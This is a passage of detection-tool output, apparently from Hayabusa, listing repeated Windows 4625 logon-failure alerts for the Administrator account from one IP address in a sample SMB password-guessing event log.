Type: 3 | Computer: tzmi8I402j71q5Wg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.244 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m0U3NYl8QEbgeJry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.277 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJJ1FOUIBInGkKPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bu0X5RisszAHEs0X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.370 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZZfs8zqT2bLOAHq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.409 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkpO31LzJfaYLyjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.461 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: BJrIsRTWUwPuySR7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.503 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHNccqtwl9Y9IhLq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.536 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: APlvDcMzvms0gehT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.585 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxOERGKI75RarVNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uvzwd5qqC7og49yW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.662 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lksm3o2g0YhFnm4Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: zwXhSPCV4qHVF9Rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z31baZ4G36idFMeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.784 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK63qylKunHZB3zS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALJxKGwyZz7JDpRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.862 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8tioTO3TEIzdzY0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.905 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5dIKTgQkvPKzKJoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.947 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ta0IMrlArbgONhDG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.985 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MKNUu4624Rvr87kK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.032 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7jIL2FkXzWqvWTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.076 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJMVh1zdQt7EikVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.113 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OqvximSAPlXZ3An | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.160 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tr2GQ1F3jccpWrsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:18.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCmbvQXXXzhHOdMG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qTp1BwPv8XiK2mrG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rnb19AXxM5ArcLxX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.359 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUS5CKq2W1rkq46d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FzKSUVdsC5eENWDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.434 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QFL07Mhy4iw5psBq | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.486 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMpitnzLXDLSXL73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.584 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSfaPdcsiRQoGYYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.616 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJRP4bS9Qgg06Z5P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.679 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3Z4veMNKngHUDoRf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmF0YFgAMSRotb1y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DmrbO3dZw46DgmZQ | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.805 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qg4CMwLpfzLrvDPj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.850 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKDKUXNNhuSqRiTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cBocrjNXjmuPCKRJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: loCrAXibgVxcOtCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.966 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZ7pHOJeOExrON2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.006 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
MeucKpaodpmdsqhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LRlmBeBlV6n4MQyo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8FYOF6HxJHqm7GW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.122 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9tBtz1GYn5J8sbFH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.160 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qn8PlxEzIu9AKUgt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdjqlNDU3U150UAw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: esaTfuwuiFAkIVs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.280 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y4LbVQ5ytgVCqFmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rWoX76sgYTVwxkD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.386 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQFJRRYn6sjYK5cD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wyVuBGEFGJqImQ7W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pRvnyVGxG8i0e3PQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.520 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: X6Hv2fj43a8j1O2P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: myP4zVFyw2qE1SV7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.612 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lpmBcVilH72dYF7E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.643 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jd9hKGDxLcnZphlL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.684 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OmXgOD9kaGJ4PIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BpQtWW0fAEzNH28B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: EgNkY8LKSWcnLM00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8S1dUwb3HjOnEs9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.869 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49ZKcnswdISJDwbS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.914 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qOuYmww71pTM0l3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.952 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PUHoGgmXKRJknRZG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.988 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6yf8LSkcwBP9s1mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.036 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmH2AMDmkZVbCt8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I23o9EQLpPpn9RlY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.125 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrEVj3DB1prpOtnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Iau1IHKxWRsqQaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdPC9LVhZS2l27XF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxcofRpjCFme3mg2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:20.290 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e1VnQLbETh1GgX0c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbdPYXx8mx4SV9G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcv3HWid3auIu7cY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.428 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2OviUvdOmk5HON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.476 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bVBSORhgFwTy2TWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DsIhCEZcfYenufvf | IP Addr: 192.168.198.149 | AuthPackage: 
